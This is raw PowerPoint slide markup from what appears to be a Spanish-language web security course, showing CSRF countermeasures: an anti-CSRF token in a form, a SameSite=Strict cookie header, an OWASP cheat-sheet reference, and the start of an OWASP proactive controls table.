        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="445811" y="3223738"/>
            <a:ext cx="2088631" cy="1253179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3848C09-AE4C-6124-4AB1-A12400668AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8848581" y="1753858"/>
            <a:ext cx="1058025" cy="1101030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Imagen 25" descr="Imagen que contiene interior, planta, oscuro, computadora&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{555FECD6-4B2E-2B42-5141-6E80D511ABC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9377593" y="4733503"/>
            <a:ext cx="443256" cy="424632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagen 12" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28FF244-00AB-1F1B-FE9F-F2B1703AD3D0}"/>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094002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CD2B-EB7D-A9A8-61C5-96F644BA96C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40BEFF4-121F-7F55-AAFD-5E7D3545E9C3}"/>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17D6962-9A75-6EFA-2EB2-B0DC95BEF332}"/>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Amenazas: Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (CRSRF) - Medidas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30306857-C817-5ACC-D77A-CB7AB295106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2" name="CuadroTexto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05702786-01D9-09B4-3B28-6283C75E48CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521983" y="1463547"/>
            <a:ext cx="10031638" cy="2308324"/>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a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Token anti-CSRF:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="/transfer.do" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRFToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="OWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZMGYwMGEwOA=="&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" i="1">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Conector recto 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{738727A2-62B4-7C24-DD0B-9195E557C771}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522989" y="4468580"/>
            <a:ext cx="6565900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="004C41"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6273B5D-F03B-9B9B-817B-A0647E15B51E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521983" y="4472713"/>
            <a:ext cx="10031638"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210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cabecera HTTP Set-Cookie:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: JSESSIONID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=Strict</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sólo se transmite para peticiones del propio sitio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26AD47F-3E35-EE6D-9204-ECEFAB8731A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563568" y="5491892"/>
            <a:ext cx="6250126" cy="461665"/>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s-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencia: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A330690-DE6E-D321-1696-08A46FC8E43A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4300182" y="3044012"/>
            <a:ext cx="4627656" cy="338554"/>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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1. Servidor envía token en el formulario</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Flecha: a la izquierda y derecha 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45CBCFD-6E24-F87D-D1A6-0F923C0064CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3881025" y="3308958"/>
            <a:ext cx="4980213" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">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pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5612DE-1E8C-A54E-806B-0AF48C89D973}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2294700" y="3107256"/>
            <a:ext cx="1640468" cy="963687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 22" descr="Imagen que contiene Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EECAFDBD-48E7-4646-722B-8DC1D0D8ED59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9226252" y="3034086"/>
            <a:ext cx="994041" cy="986321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E24F1382-6262-A866-F65A-717950D2CA29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4328862" y="3787106"/>
            <a:ext cx="4383314" cy="584775"/>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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2. Si la petición no incluye el token enviado por el servidor, se descarta</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 2" descr="Mano Como Pulgar - Gráficos vectoriales gratis en Pixabay - Pixabay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7831F44E-FB4D-2362-D626-F5F50D5D7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4584" y="4699631"/>
            <a:ext cx="675338" cy="7464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Mano Como Pulgar - Gráficos vectoriales gratis en Pixabay - Pixabay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770064A8-15E2-66C8-F828-FBEDC69B75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4584" y="1304263"/>
            <a:ext cx="675338" cy="74649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71F4F260-7714-2AB2-17D6-FC7E437C6531}"/>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454186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081AE-9B11-4E3D-5532-926CD912340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7D23978-3870-5AA4-3C1F-132B6F111964}"/>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0FD54D8-D300-57DF-F56A-1A241D1429D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="139798"/>
            <a:ext cx="9166295" cy="1569660"/>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medidas de mitigación – Controles proactivos de OWASP Top 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF731E1C-7AAA-F307-252D-7108B5DB871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2" name="Tabla 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2CF6625-24F3-1E06-8296-442C0CBD69FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1873844601"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1179530" y="1854304"/>
          <a:ext cx="9516966" cy="3906705"/>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035486">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="315090195"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3746195">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="500503853"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1274231">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3175033529"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3461054">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3963310215"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Definir los </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>requisitos de seguridad</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>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defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Implementar la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
